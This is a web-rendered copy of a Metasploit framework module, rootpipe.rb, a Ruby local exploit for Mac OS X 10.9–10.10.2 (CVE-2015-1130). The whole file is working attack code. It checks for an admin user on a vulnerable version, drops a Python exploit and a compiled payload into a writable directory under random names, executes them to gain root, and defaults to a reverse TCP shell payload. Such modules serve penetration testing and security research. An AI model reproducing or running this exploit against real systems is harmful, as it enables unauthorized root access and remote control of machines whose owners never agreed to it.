CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/rootpipe.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GreatRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Post::OSX::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(update_info(info,

17
      'Name'           => 'Apple OS X Rootpipe Privilege Escalation',

18
      'Description'    => %q{

19
        This module exploits a hidden backdoor API in Apple's Admin framework on

20
        Mac OS X to escalate privileges to root, dubbed "Rootpipe."

21


22
        This module was tested on Yosemite 10.10.2 and should work on previous versions.

23


24
        The patch for this issue was not backported to older releases.

25


26
        Note: you must run this exploit as an admin user to escalate to root.

27
      },

28
      'Author'         => [

29
        'Emil Kvarnhammar', # Vulnerability discovery and PoC

30
        'joev',             # Copy/paste monkey

31
        'wvu'               # Meta copy/paste monkey

32
      ],

33
      'References'     => [

34
        ['CVE',   '2015-1130'],

35
        ['OSVDB', '114114'],

36
        ['EDB',   '36692'],

37
        ['URL',   'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']

38
      ],

39
      'DisclosureDate' => '2015-04-09',

40
      'License'        => MSF_LICENSE,

41
      'Platform'       => 'osx',

42
      'Arch'           => ARCH_X64,

43
      'SessionTypes'   => ['shell'],

44
      'Privileged'     => true,

45
      'Targets'        => [

46
        ['Mac OS X 10.9-10.10.2', {}]

47
      ],

48
      'DefaultTarget'  => 0,

49
      'DefaultOptions' => {

50
        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp',

51
        'PrependSetreuid' => true

52
      }

53
    ))

54


55
    register_options [

56
      OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])

57
    ]

58
    register_advanced_options [

59
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])

60
    ]

61
  end

62


63
  def base_dir

64
    datastore['WritableDir'].to_s

65
  end

66


67
  def check

68
    (ver? && is_admin?) ? CheckCode::Appears : CheckCode::Safe

69
  end

70


71
  def exploit

72
    if is_root?

73
      fail_with Failure::BadConfig, 'Session already has root privileges'

74
    end

75


76
    unless is_admin?

77
      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."

78
    end

79


80
    if check != CheckCode::Appears

81
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

82
    end

83


84
    unless writable? base_dir

85
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

86
    end

87


88
    print_status("Writing exploit to `#{exploit_file}'")

89
    write_file(exploit_file, python_exploit)

90
    register_file_for_cleanup(exploit_file)

91


92
    print_status("Writing payload to `#{payload_file}'")

93
    write_file(payload_file, binary_payload)

94
    register_file_for_cleanup(payload_file)

95


96
    print_status('Executing exploit...')

97
    cmd_exec(sploit)

98
    print_status('Executing payload...')

99
    cmd_exec(payload_file)

100
  end

101


102
  def ver?

103
    Rex::Version.new(get_sysinfo['ProductVersion']).between?(

104
      Rex::Version.new('10.9'), Rex::Version.new('10.10.2')

105
    )

106
  end

107


108
  def sploit

109
    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"

110
  end

111


112
  def python_exploit

113
    File.read(File.join(

114
      Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'

115
    ))

116
  end

117


118
  def binary_payload

119
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

120
  end

121


122
  def exploit_file

123
    @exploit_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"

124
  end

125


126
  def payload_file

127
    @payload_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"

128
  end

129
end

130


131